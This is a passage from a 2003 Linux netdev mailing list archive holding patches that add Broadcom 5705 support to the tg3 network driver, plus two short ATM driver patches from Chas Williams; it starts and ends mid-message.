tw32(MAC_RCV_VALUE_15, 0); + + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + limit = 8; + else + limit = 16; + if (tp->tg3_flags & TG3_FLAG_ENABLE_ASF) + limit -= 4; + switch (limit) { + case 16: + tw32(MAC_RCV_RULE_15, 0); tw32(MAC_RCV_VALUE_15, 0); + case 15: + tw32(MAC_RCV_RULE_14, 0); tw32(MAC_RCV_VALUE_14, 0); + case 14: + tw32(MAC_RCV_RULE_13, 0); tw32(MAC_RCV_VALUE_13, 0); + case 13: + tw32(MAC_RCV_RULE_12, 0); tw32(MAC_RCV_VALUE_12, 0); + case 12: + tw32(MAC_RCV_RULE_11, 0); tw32(MAC_RCV_VALUE_11, 0); + case 11: + tw32(MAC_RCV_RULE_10, 0); tw32(MAC_RCV_VALUE_10, 0); + case 10: + 
tw32(MAC_RCV_RULE_9, 0); tw32(MAC_RCV_VALUE_9, 0); + case 9: + tw32(MAC_RCV_RULE_8, 0); tw32(MAC_RCV_VALUE_8, 0); + case 8: + tw32(MAC_RCV_RULE_7, 0); tw32(MAC_RCV_VALUE_7, 0); + case 7: + tw32(MAC_RCV_RULE_6, 0); tw32(MAC_RCV_VALUE_6, 0); + case 6: + tw32(MAC_RCV_RULE_5, 0); tw32(MAC_RCV_VALUE_5, 0); + case 5: + tw32(MAC_RCV_RULE_4, 0); tw32(MAC_RCV_VALUE_4, 0); + case 4: + /* tw32(MAC_RCV_RULE_3, 0); tw32(MAC_RCV_VALUE_3, 0); */ + case 3: + /* tw32(MAC_RCV_RULE_2, 0); tw32(MAC_RCV_VALUE_2, 0); */ + case 2: + case 1: + + default: + break; + }; if (tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) tg3_enable_ints(tp); @@ -4368,6 +4623,50 @@ return err; } +#define TG3_STAT_ADD32(PSTAT, REG) \ +do { u32 __val = tr32(REG); \ + (PSTAT)->low += __val; \ + if ((PSTAT)->low < __val) \ + (PSTAT)->high += 1; \ +} while (0) + +static void tg3_periodic_fetch_stats(struct tg3 *tp) +{ + struct tg3_hw_stats *sp = tp->hw_stats; + + if (!netif_carrier_ok(tp->dev)) + return; + + TG3_STAT_ADD32(&sp->tx_octets, MAC_TX_STATS_OCTETS); + TG3_STAT_ADD32(&sp->tx_collisions, MAC_TX_STATS_COLLISIONS); + TG3_STAT_ADD32(&sp->tx_xon_sent, MAC_TX_STATS_XON_SENT); + TG3_STAT_ADD32(&sp->tx_xoff_sent, MAC_TX_STATS_XOFF_SENT); + TG3_STAT_ADD32(&sp->tx_mac_errors, MAC_TX_STATS_MAC_ERRORS); + TG3_STAT_ADD32(&sp->tx_single_collisions, MAC_TX_STATS_SINGLE_COLLISIONS); + TG3_STAT_ADD32(&sp->tx_mult_collisions, MAC_TX_STATS_MULT_COLLISIONS); + TG3_STAT_ADD32(&sp->tx_deferred, MAC_TX_STATS_DEFERRED); + TG3_STAT_ADD32(&sp->tx_excessive_collisions, MAC_TX_STATS_EXCESSIVE_COL); + TG3_STAT_ADD32(&sp->tx_late_collisions, MAC_TX_STATS_LATE_COL); + TG3_STAT_ADD32(&sp->tx_ucast_packets, MAC_TX_STATS_UCAST); + TG3_STAT_ADD32(&sp->tx_mcast_packets, MAC_TX_STATS_MCAST); + TG3_STAT_ADD32(&sp->tx_bcast_packets, MAC_TX_STATS_BCAST); + + TG3_STAT_ADD32(&sp->rx_octets, MAC_RX_STATS_OCTETS); + TG3_STAT_ADD32(&sp->rx_fragments, MAC_RX_STATS_FRAGMENTS); + TG3_STAT_ADD32(&sp->rx_ucast_packets, MAC_RX_STATS_UCAST); + 
TG3_STAT_ADD32(&sp->rx_mcast_packets, MAC_RX_STATS_MCAST); + TG3_STAT_ADD32(&sp->rx_bcast_packets, MAC_RX_STATS_BCAST); + TG3_STAT_ADD32(&sp->rx_fcs_errors, MAC_RX_STATS_FCS_ERRORS); + TG3_STAT_ADD32(&sp->rx_align_errors, MAC_RX_STATS_ALIGN_ERRORS); + TG3_STAT_ADD32(&sp->rx_xon_pause_rcvd, MAC_RX_STATS_XON_PAUSE_RECVD); + TG3_STAT_ADD32(&sp->rx_xoff_pause_rcvd, MAC_RX_STATS_XOFF_PAUSE_RECVD); + TG3_STAT_ADD32(&sp->rx_mac_ctrl_rcvd, MAC_RX_STATS_MAC_CTRL_RECVD); + TG3_STAT_ADD32(&sp->rx_xoff_entered, MAC_RX_STATS_XOFF_ENTERED); + TG3_STAT_ADD32(&sp->rx_frame_too_long_errors, MAC_RX_STATS_FRAME_TOO_LONG); + TG3_STAT_ADD32(&sp->rx_jabbers, MAC_RX_STATS_JABBERS); + TG3_STAT_ADD32(&sp->rx_undersize_packets, MAC_RX_STATS_UNDERSIZE); +} + static void tg3_timer(unsigned long __opaque) { struct tg3 *tp = (struct tg3 *) __opaque; @@ -4396,6 +4695,9 @@ return; } + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + tg3_periodic_fetch_stats(tp); + /* This part only runs once per second. */ if (!--tp->timer_counter) { if (tp->tg3_flags & TG3_FLAG_USE_LINKCHG_REG) { @@ -4849,6 +5151,13 @@ if (!hw_stats) return old_stats; + /* On the 5705 we can't DMA the stats to memory, thus + * a timer simply keeps tp->stats uptodate with direct + * periodic reads of the statistics registers via a timer. 
+ */ + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + return stats; + stats->rx_packets = old_stats->rx_packets + get_stat64(&hw_stats->rx_ucast_packets) + get_stat64(&hw_stats->rx_mcast_packets) + @@ -5304,6 +5613,13 @@ spin_lock(&tp->tx_lock); tp->rx_pending = ering.rx_pending; + if (tp->pci_chip_rev_id == CHIPREV_ID_5705_A1 && +#if TG3_DO_TSO != 0 + !(dev->features & NETIF_F_TSO) && +#endif + !(tr32(TG3PCI_PCISTATE) & PCISTATE_BUS_SPEED_HIGH) && + tp->rx_pending > 64) + tp->rx_pending = 64; tp->rx_jumbo_pending = ering.rx_jumbo_pending; tp->tx_pending = ering.tx_pending; @@ -5709,6 +6025,7 @@ u32 nic_cfg; tg3_read_mem(tp, NIC_SRAM_DATA_CFG, &nic_cfg); + tp->nic_sram_data_cfg = nic_cfg; eeprom_signature_found = 1; @@ -5742,8 +6059,10 @@ eeprom_led_mode = led_mode_auto; break; }; - if ((tp->pci_chip_rev_id == CHIPREV_ID_5703_A1 || - tp->pci_chip_rev_id == CHIPREV_ID_5703_A2) && + + if (((GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5703) || + (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) || + (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705)) && (nic_cfg & NIC_SRAM_DATA_CFG_EEPROM_WP)) tp->tg3_flags |= TG3_FLAG_EEPROM_WRITE_PROT; @@ -5825,9 +6144,7 @@ } /* Enable Ethernet@WireSpeed */ - tg3_writephy(tp, MII_TG3_AUX_CTRL, 0x7007); - tg3_readphy(tp, MII_TG3_AUX_CTRL, &val); - tg3_writephy(tp, MII_TG3_AUX_CTRL, (val | (1 << 15) | (1 << 4))); + tg3_phy_set_wirespeed(tp); if (!err && ((tp->phy_id & PHY_ID_MASK) == PHY_ID_BCM5401)) { err = tg3_init_5401phy_dsp(tp); @@ -6084,6 +6401,13 @@ tp->tg3_flags |= TG3_FLAG_WOL_SPEED_100MB; } + /* A few boards don't want Ethernet@WireSpeed phy feature */ + if ((GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700) || + ((GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) && + (tp->pci_chip_rev_id != CHIPREV_ID_5705_A0) && + (tp->pci_chip_rev_id != CHIPREV_ID_5705_A1))) + tp->tg3_flags2 |= TG3_FLG2_NO_ETH_WIRE_SPEED; + /* Only 5701 and later support tagged irq status mode. 
* * However, since we are using NAPI avoid tagged irq status @@ -6141,7 +6465,8 @@ /* Determine if TX descriptors will reside in * main memory or in the chip SRAM. */ - if (tp->tg3_flags & TG3_FLAG_PCIX_TARGET_HWBUG) + if ((tp->tg3_flags & TG3_FLAG_PCIX_TARGET_HWBUG) != 0 || + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) tp->tg3_flags |= TG3_FLAG_HOST_TXDS; grc_misc_cfg = tr32(GRC_MISC_CFG); @@ -6153,8 +6478,9 @@ tp->split_mode_max_reqs = SPLIT_MODE_5704_MAX_REQ; } - /* this one is limited to 10/100 only */ - if (grc_misc_cfg == GRC_MISC_CFG_BOARD_ID_5702FE) + /* these are limited to 10/100 only */ + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5703 && + (grc_misc_cfg == 0x8000 || grc_misc_cfg == 0x4000)) tp->tg3_flags |= TG3_FLAG_10_100_ONLY; err = tg3_phy_probe(tp); @@ -6376,8 +6702,6 @@ goto out_nofree; } - tw32(TG3PCI_CLOCK_CTRL, 0); - if ((tp->tg3_flags & TG3_FLAG_PCIX_MODE) == 0) { tp->dma_rwctrl = (0x7 << DMA_RWCTRL_PCI_WRITE_CMD_SHIFT) | @@ -6385,7 +6709,9 @@ (0x7 << DMA_RWCTRL_WRITE_WATER_SHIFT) | (0x7 << DMA_RWCTRL_READ_WATER_SHIFT) | (0x0f << DMA_RWCTRL_MIN_DMA_SHIFT); - /* XXX 5705 note: set MIN_DMA to zero here */ + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + tp->dma_rwctrl &= ~(DMA_RWCTRL_MIN_DMA + << DMA_RWCTRL_MIN_DMA_SHIFT); } else { if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) tp->dma_rwctrl = @@ -6488,6 +6814,11 @@ tw32(TG3PCI_DMA_RW_CTRL, tp->dma_rwctrl); +#if 0 + /* Unneeded, already done by tg3_get_invariants. 
*/ + tg3_switch_clocks(tp); +#endif + ret = 0; if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5700 && GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5701) @@ -6592,12 +6923,35 @@ case PHY_ID_BCM5701: return "5701"; case PHY_ID_BCM5703: return "5703"; case PHY_ID_BCM5704: return "5704"; + case PHY_ID_BCM5705: return "5705"; case PHY_ID_BCM8002: return "8002"; case PHY_ID_SERDES: return "serdes"; default: return "unknown"; }; } +static struct pci_dev * __devinit tg3_find_5704_peer(struct tg3 *tp) +{ + struct pci_dev *peer = NULL; + unsigned int func; + + for (func = 0; func < 7; func++) { + unsigned int devfn = tp->pdev->devfn; + + devfn &= ~7; + devfn |= func; + + if (devfn == tp->pdev->devfn) + continue; + peer = pci_find_slot(tp->pdev->bus->number, devfn); + if (peer) + break; + } + if (!peer || peer == tp->pdev) + BUG(); + return peer; +} + static int __devinit tg3_init_one(struct pci_dev *pdev, const struct pci_device_id *ent) { @@ -6751,6 +7105,38 @@ "aborting.\n"); goto err_out_iounmap; } + + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + tp->bufmgr_config.mbuf_read_dma_low_water = + DEFAULT_MB_RDMA_LOW_WATER_5705; + tp->bufmgr_config.mbuf_mac_rx_low_water = + DEFAULT_MB_MACRX_LOW_WATER_5705; + tp->bufmgr_config.mbuf_high_water = + DEFAULT_MB_HIGH_WATER_5705; + } + +#if TG3_DO_TSO != 0 + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701 || + tp->pci_chip_rev_id == CHIPREV_ID_5705_A0 || + (tp->tg3_flags & TG3_FLAG_ENABLE_ASF) != 0) + dev->features &= ~NETIF_F_TSO; + +#if 1 /* Kill this when 5705 TSO firmware added. 
*/ + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + dev->features &= ~NETIF_F_TSO; +#endif +#endif + + if (tp->pci_chip_rev_id == CHIPREV_ID_5705_A1 && +#if TG3_DO_TSO != 0 + !(dev->features & NETIF_F_TSO) && +#endif + !(tr32(TG3PCI_PCISTATE) & PCISTATE_BUS_SPEED_HIGH)) + tp->rx_pending = 64; + + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) + tp->pdev_peer = tg3_find_5704_peer(tp); err = tg3_get_device_address(tp); if (err) { diff -Nru a/drivers/net/tg3.h b/drivers/net/tg3.h --- a/drivers/net/tg3.h Tue Jul 29 13:08:22 2003 +++ b/drivers/net/tg3.h Tue Jul 29 13:08:22 2003 @@ -24,6 +24,7 @@ #define RX_COPY_THRESHOLD 256 #define RX_STD_MAX_SIZE 1536 +#define RX_STD_MAX_SIZE_5705 512 #define RX_JUMBO_MAX_SIZE 0xdeadbeef /* XXX */ /* First 256 bytes are a mirror of PCI config space. */ @@ -59,7 +60,7 @@ #define PCIX_CAPS_SPLIT_SHIFT 20 #define PCIX_CAPS_BURST_MASK 0x000c0000 #define PCIX_CAPS_BURST_SHIFT 18 -#define PCIX_CAPS_MAX_BURST_5704 2 +#define PCIX_CAPS_MAX_BURST_CPIOB 2 #define TG3PCI_PM_CAP_PTR 0x00000041 #define TG3PCI_X_COMMAND 0x00000042 #define TG3PCI_X_STATUS 0x00000044 @@ -115,11 +116,14 @@ #define CHIPREV_ID_5704_A0 0x2000 #define CHIPREV_ID_5704_A1 0x2001 #define CHIPREV_ID_5704_A2 0x2002 +#define CHIPREV_ID_5705_A0 0x3000 +#define CHIPREV_ID_5705_A1 0x3001 #define GET_ASIC_REV(CHIP_REV_ID) ((CHIP_REV_ID) >> 12) #define ASIC_REV_5700 0x07 #define ASIC_REV_5701 0x00 #define ASIC_REV_5703 0x01 #define ASIC_REV_5704 0x02 +#define ASIC_REV_5705 0x03 #define GET_CHIP_REV(CHIP_REV_ID) ((CHIP_REV_ID) >> 8) #define CHIPREV_5700_AX 0x70 #define CHIPREV_5700_BX 0x71 @@ -180,6 +184,9 @@ #define CLOCK_CTRL_ALTCLK 0x00001000 #define CLOCK_CTRL_PWRDOWN_PLL133 0x00008000 #define CLOCK_CTRL_44MHZ_CORE 0x00040000 +#define CLOCK_CTRL_625_CORE 0x00100000 +#define CLOCK_CTRL_FORCE_CLKRUN 0x00200000 +#define CLOCK_CTRL_CLKRUN_OENABLE 0x00400000 #define CLOCK_CTRL_DELAY_PCI_GRANT 0x80000000 #define TG3PCI_REG_BASE_ADDR 0x00000078 #define 
TG3PCI_MEM_WIN_BASE_ADDR 0x0000007c @@ -457,17 +464,89 @@ #define MAC_RCV_RULE_CFG 0x00000500 #define RCV_RULE_CFG_DEFAULT_CLASS 0x00000008 #define MAC_LOW_WMARK_MAX_RX_FRAME 0x00000504 -/* 0x504 --> 0x590 unused */ +/* 0x508 --> 0x520 unused */ +#define MAC_HASHREGU_0 0x00000520 +#define MAC_HASHREGU_1 0x00000524 +#define MAC_HASHREGU_2 0x00000528 +#define MAC_HASHREGU_3 0x0000052c +#define MAC_EXTADDR_0_HIGH 0x00000530 +#define MAC_EXTADDR_0_LOW 0x00000534 +#define MAC_EXTADDR_1_HIGH 0x00000538 +#define MAC_EXTADDR_1_LOW 0x0000053c +#define MAC_EXTADDR_2_HIGH 0x00000540 +#define MAC_EXTADDR_2_LOW 0x00000544 +#define MAC_EXTADDR_3_HIGH 0x00000548 +#define MAC_EXTADDR_3_LOW 0x0000054c +#define MAC_EXTADDR_4_HIGH 0x00000550 +#define MAC_EXTADDR_4_LOW 0x00000554 +#define MAC_EXTADDR_5_HIGH 0x00000558 +#define MAC_EXTADDR_5_LOW 0x0000055c +#define MAC_EXTADDR_6_HIGH 0x00000560 +#define MAC_EXTADDR_6_LOW 0x00000564 +#define MAC_EXTADDR_7_HIGH 0x00000568 +#define MAC_EXTADDR_7_LOW 0x0000056c +#define MAC_EXTADDR_8_HIGH 0x00000570 +#define MAC_EXTADDR_8_LOW 0x00000574 +#define MAC_EXTADDR_9_HIGH 0x00000578 +#define MAC_EXTADDR_9_LOW 0x0000057c +#define MAC_EXTADDR_10_HIGH 0x00000580 +#define MAC_EXTADDR_10_LOW 0x00000584 +#define MAC_EXTADDR_11_HIGH 0x00000588 +#define MAC_EXTADDR_11_LOW 0x0000058c #define MAC_SERDES_CFG 0x00000590 #define MAC_SERDES_STAT 0x00000594 /* 0x598 --> 0x600 unused */ #define MAC_TX_MAC_STATE_BASE 0x00000600 /* 16 bytes */ #define MAC_RX_MAC_STATE_BASE 0x00000610 /* 20 bytes */ /* 0x624 --> 0x800 unused */ -#define MAC_RX_STATS_BASE 0x00000800 /* 26 32-bit words */ -/* 0x868 --> 0x880 unused */ -#define MAC_TX_STATS_BASE 0x00000880 /* 28 32-bit words */ -/* 0x8f0 --> 0xc00 unused */ +#define MAC_TX_STATS_OCTETS 0x00000800 +#define MAC_TX_STATS_RESV1 0x00000804 +#define MAC_TX_STATS_COLLISIONS 0x00000808 +#define MAC_TX_STATS_XON_SENT 0x0000080c +#define MAC_TX_STATS_XOFF_SENT 0x00000810 +#define MAC_TX_STATS_RESV2 0x00000814 +#define 
MAC_TX_STATS_MAC_ERRORS 0x00000818 +#define MAC_TX_STATS_SINGLE_COLLISIONS 0x0000081c +#define MAC_TX_STATS_MULT_COLLISIONS 0x00000820 +#define MAC_TX_STATS_DEFERRED 0x00000824 +#define MAC_TX_STATS_RESV3 0x00000828 +#define MAC_TX_STATS_EXCESSIVE_COL 0x0000082c +#define MAC_TX_STATS_LATE_COL 0x00000830 +#define MAC_TX_STATS_RESV4_1 0x00000834 +#define MAC_TX_STATS_RESV4_2 0x00000838 +#define MAC_TX_STATS_RESV4_3 0x0000083c +#define MAC_TX_STATS_RESV4_4 0x00000840 +#define MAC_TX_STATS_RESV4_5 0x00000844 +#define MAC_TX_STATS_RESV4_6 0x00000848 +#define MAC_TX_STATS_RESV4_7 0x0000084c +#define MAC_TX_STATS_RESV4_8 0x00000850 +#define MAC_TX_STATS_RESV4_9 0x00000854 +#define MAC_TX_STATS_RESV4_10 0x00000858 +#define MAC_TX_STATS_RESV4_11 0x0000085c +#define MAC_TX_STATS_RESV4_12 0x00000860 +#define MAC_TX_STATS_RESV4_13 0x00000864 +#define MAC_TX_STATS_RESV4_14 0x00000868 +#define MAC_TX_STATS_UCAST 0x0000086c +#define MAC_TX_STATS_MCAST 0x00000870 +#define MAC_TX_STATS_BCAST 0x00000874 +#define MAC_TX_STATS_RESV5_1 0x00000878 +#define MAC_TX_STATS_RESV5_2 0x0000087c +#define MAC_RX_STATS_OCTETS 0x00000880 +#define MAC_RX_STATS_RESV1 0x00000884 +#define MAC_RX_STATS_FRAGMENTS 0x00000888 +#define MAC_RX_STATS_UCAST 0x0000088c +#define MAC_RX_STATS_MCAST 0x00000890 +#define MAC_RX_STATS_BCAST 0x00000894 +#define MAC_RX_STATS_FCS_ERRORS 0x00000898 +#define MAC_RX_STATS_ALIGN_ERRORS 0x0000089c +#define MAC_RX_STATS_XON_PAUSE_RECVD 0x000008a0 +#define MAC_RX_STATS_XOFF_PAUSE_RECVD 0x000008a4 +#define MAC_RX_STATS_MAC_CTRL_RECVD 0x000008a8 +#define MAC_RX_STATS_XOFF_ENTERED 0x000008ac +#define MAC_RX_STATS_FRAME_TOO_LONG 0x000008b0 +#define MAC_RX_STATS_JABBERS 0x000008b4 +#define MAC_RX_STATS_UNDERSIZE 0x000008b8 +/* 0x8bc --> 0xc00 unused */ /* Send data initiator control registers */ #define SNDDATAI_MODE 0x00000c00 @@ -812,13 +891,16 @@ #define BUFMGR_MB_POOL_ADDR 0x00004408 #define BUFMGR_MB_POOL_SIZE 0x0000440c #define BUFMGR_MB_RDMA_LOW_WATER 0x00004410 -#define 
DEFAULT_MB_RDMA_LOW_WATER 0x00000040 +#define DEFAULT_MB_RDMA_LOW_WATER 0x00000050 +#define DEFAULT_MB_RDMA_LOW_WATER_5705 0x00000000 #define DEFAULT_MB_RDMA_LOW_WATER_JUMBO 0x00000130 #define BUFMGR_MB_MACRX_LOW_WATER 0x00004414 #define DEFAULT_MB_MACRX_LOW_WATER 0x00000020 +#define DEFAULT_MB_MACRX_LOW_WATER_5705 0x00000010 #define DEFAULT_MB_MACRX_LOW_WATER_JUMBO 0x00000098 #define BUFMGR_MB_HIGH_WATER 0x00004418 #define DEFAULT_MB_HIGH_WATER 0x00000060 +#define DEFAULT_MB_HIGH_WATER_5705 0x00000060 #define DEFAULT_MB_HIGH_WATER_JUMBO 0x0000017c #define BUFMGR_RX_MB_ALLOC_REQ 0x0000441c #define BUFMGR_MB_ALLOC_BIT 0x10000000 @@ -854,6 +936,8 @@ #define RDMAC_MODE_LNGREAD_ENAB 0x00000200 #define RDMAC_MODE_SPLIT_ENABLE 0x00000800 #define RDMAC_MODE_SPLIT_RESET 0x00001000 +#define RDMAC_MODE_FIFO_SIZE_128 0x00020000 +#define RDMAC_MODE_FIFO_LONG_BURST 0x00030000 #define RDMAC_STATUS 0x00004804 #define RDMAC_STATUS_TGTABORT 0x00000004 #define RDMAC_STATUS_MSTABORT 0x00000008 @@ -877,6 +961,7 @@ #define WDMAC_MODE_FIFOURUN_ENAB 0x00000080 #define WDMAC_MODE_FIFOOREAD_ENAB 0x00000100 #define WDMAC_MODE_LNGREAD_ENAB 0x00000200 +#define WDMAC_MODE_RX_ACCEL 0x00000400 #define WDMAC_STATUS 0x00004c04 #define WDMAC_STATUS_TGTABORT 0x00000004 #define WDMAC_STATUS_MSTABORT 0x00000008 @@ -1141,6 +1226,7 @@ #define GRC_MISC_CFG_BOARD_ID_5704CIOBE 0x00004000 #define GRC_MISC_CFG_BOARD_ID_5704_A2 0x00008000 #define GRC_MISC_CFG_BOARD_ID_AC91002A1 0x00018000 +#define GRC_MISC_CFG_KEEP_GPHY_POWER 0x04000000 #define GRC_LOCAL_CTRL 0x00006808 #define GRC_LCLCTRL_INT_ACTIVE 0x00000001 #define GRC_LCLCTRL_CLEARINT 0x00000002 @@ -1275,6 +1361,7 @@ #define NIC_SRAM_DATA_CFG_WOL_ENABLE 0x00000040 #define NIC_SRAM_DATA_CFG_ASF_ENABLE 0x00000080 #define NIC_SRAM_DATA_CFG_EEPROM_WP 0x00000100 +#define NIC_SRAM_DATA_CFG_MINI_PCI 0x00001000 #define NIC_SRAM_DATA_CFG_FIBER_WOL 0x00004000 #define NIC_SRAM_DATA_PHY_ID 0x00000b74 @@ -1312,6 +1399,8 @@ #define NIC_SRAM_MBUF_POOL_BASE 0x00008000 
 #define NIC_SRAM_MBUF_POOL_SIZE96	0x00018000
 #define NIC_SRAM_MBUF_POOL_SIZE64	0x00010000
+#define NIC_SRAM_MBUF_POOL_BASE5705	0x00010000
+#define NIC_SRAM_MBUF_POOL_SIZE5705	0x0000e000
 /* Currently this is fixed. */
 #define PHY_ADDR		0x01
@@ -1823,6 +1912,7 @@
 #define TG3_FLAG_INIT_COMPLETE		0x80000000
 	u32				tg3_flags2;
 #define TG3_FLG2_RESTART_TIMER		0x00000001
+#define TG3_FLG2_NO_ETH_WIRE_SPEED	0x00000002
 	u32				split_mode_max_reqs;
 #define SPLIT_MODE_5704_MAX_REQ		3
@@ -1867,6 +1957,7 @@
 #define PHY_ID_BCM5701			0x60008110
 #define PHY_ID_BCM5703			0x60008160
 #define PHY_ID_BCM5704			0x60008190
+#define PHY_ID_BCM5705			0x600081a0
 #define PHY_ID_BCM8002			0x60010140
 #define PHY_ID_SERDES			0xfeedbee0
 #define PHY_ID_INVALID			0xffffffff
@@ -1879,6 +1970,9 @@
 	enum phy_led_mode		led_mode;
 	char				board_part_number[24];
+	u32				nic_sram_data_cfg;
+	u32				pci_clock_ctrl;
+	struct pci_dev			*pdev_peer;
 	/* This macro assumes the passed PHY ID is already masked
 	 * with PHY_ID_MASK.
@@ -1887,6 +1981,7 @@
 	((X) == PHY_ID_BCM5400 || (X) == PHY_ID_BCM5401 || \
 	 (X) == PHY_ID_BCM5411 || (X) == PHY_ID_BCM5701 || \
 	 (X) == PHY_ID_BCM5703 || (X) == PHY_ID_BCM5704 || \
+	 (X) == PHY_ID_BCM5705 || \
 	 (X) == PHY_ID_BCM8002 || (X) == PHY_ID_SERDES)
 	struct tg3_hw_stats		*hw_stats;
diff -Nru a/include/linux/pci_ids.h b/include/linux/pci_ids.h
--- a/include/linux/pci_ids.h	Tue Jul 29 13:08:22 2003
+++ b/include/linux/pci_ids.h	Tue Jul 29 13:08:22 2003
@@ -1646,6 +1646,8 @@
 #define PCI_DEVICE_ID_TIGON3_5703	0x1647
 #define PCI_DEVICE_ID_TIGON3_5704	0x1648
 #define PCI_DEVICE_ID_TIGON3_5702FE	0x164d
+#define PCI_DEVICE_ID_TIGON3_5705	0x1653
+#define PCI_DEVICE_ID_TIGON3_5705M	0x165d
 #define PCI_DEVICE_ID_TIGON3_5702X	0x16a6
 #define PCI_DEVICE_ID_TIGON3_5703X	0x16a7
 #define PCI_DEVICE_ID_TIGON3_5704S	0x16a8

From chas@locutus.cmf.nrl.navy.mil Tue Jul 29 10:45:25 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 10:45:30 -0700 (PDT)
Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil
[134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6THjOFl029407 for ; Tue, 29 Jul 2003 10:45:25 -0700
Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6THjIsG028329; Tue, 29 Jul 2003 13:45:20 -0400 (EDT)
Message-Id: <200307291745.h6THjIsG028329@ginger.cmf.nrl.navy.mil>
To: bellucda@tiscali.it
Cc: davem@redhat.com, netdev@oss.sgi.com
Subject: Re: [PATCH] replace current->state = x with set_current_state(x) in drivers/atm/* [2.6.0-test1]
In-reply-to: Your message of "Fri, 25 Jul 2003 20:42:35 +0200." <200307252042.35832.bellucda@tiscali.it>
Date: Tue, 29 Jul 2003 13:42:36 -0400
From: chas williams
X-Spam-Score: () hits=-2.9
X-Virus-Scanned: NAI Completed
X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang)
X-archive-position: 4367
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: chas@cmf.nrl.navy.mil
Precedence: bulk
X-list: netdev

dave, please apply this to the 2.6 tree.

In message <200307252042.35832.bellucda@tiscali.it>, Daniele Bellucci writes:
>Hi Chas,
>ACME told me to post my patches to you ....
>
>please tell me if correct.

[atm]: use set_current_state(x) (from bellucda@tiscali.it)

# This is a BitKeeper generated patch for the following project:
# Project Name: Linux kernel tree
# This patch format is intended for GNU patch command version 2.5 or higher.
# This patch includes the following deltas: # ChangeSet 1.1598 -> 1.1599 # drivers/atm/firestream.c 1.18 -> 1.19 # drivers/atm/atmtcp.c 1.15 -> 1.16 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/29 chas@relax.cmf.nrl.navy.mil 1.1599 # use set_current_state(x) (from bellucda@tiscali.it) # -------------------------------------------- # diff -Nru a/drivers/atm/atmtcp.c b/drivers/atm/atmtcp.c --- a/drivers/atm/atmtcp.c Tue Jul 29 13:41:18 2003 +++ b/drivers/atm/atmtcp.c Tue Jul 29 13:41:18 2003 @@ -77,7 +77,7 @@ set_current_state(TASK_UNINTERRUPTIBLE); schedule(); } - current->state = TASK_RUNNING; + set_current_state(TASK_RUNNING); remove_wait_queue(vcc->sk->sk_sleep, &wait); return error; } diff -Nru a/drivers/atm/firestream.c b/drivers/atm/firestream.c --- a/drivers/atm/firestream.c Tue Jul 29 13:41:18 2003 +++ b/drivers/atm/firestream.c Tue Jul 29 13:41:18 2003 @@ -1722,7 +1722,7 @@ } /* Try again after 10ms. */ - current->state = TASK_UNINTERRUPTIBLE; + set_current_state(TASK_UNINTERRUPTIBLE); schedule_timeout ((HZ+99)/100); } From chas@locutus.cmf.nrl.navy.mil Tue Jul 29 10:59:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 10:59:59 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6THxoFl030465 for ; Tue, 29 Jul 2003 10:59:51 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6THxlsG028613; Tue, 29 Jul 2003 13:59:47 -0400 (EDT) Message-Id: <200307291759.h6THxlsG028613@ginger.cmf.nrl.navy.mil> To: davem@redhat.com cc: netdev@oss.sgi.com Subject: [PATCH][ATM][2.4] export try_atm_clip_ops not atm_clip_ops_mutex Reply-To: chas3@users.sourceforge.net Date: Tue, 29 Jul 2003 13:57:05 -0400 From: chas williams X-Spam-Score: () hits=0.5 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . 
roaringpenguin . com / mimedefang) X-archive-position: 4368 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev please apply to 2.4 -- thanks [atm]: export try_atm_clip_ops not atm_clip_ops_mutex # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1037 -> 1.1038 # net/atm/common.c 1.29 -> 1.30 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/22 chas@relax.cmf.nrl.navy.mil 1.1038 # export 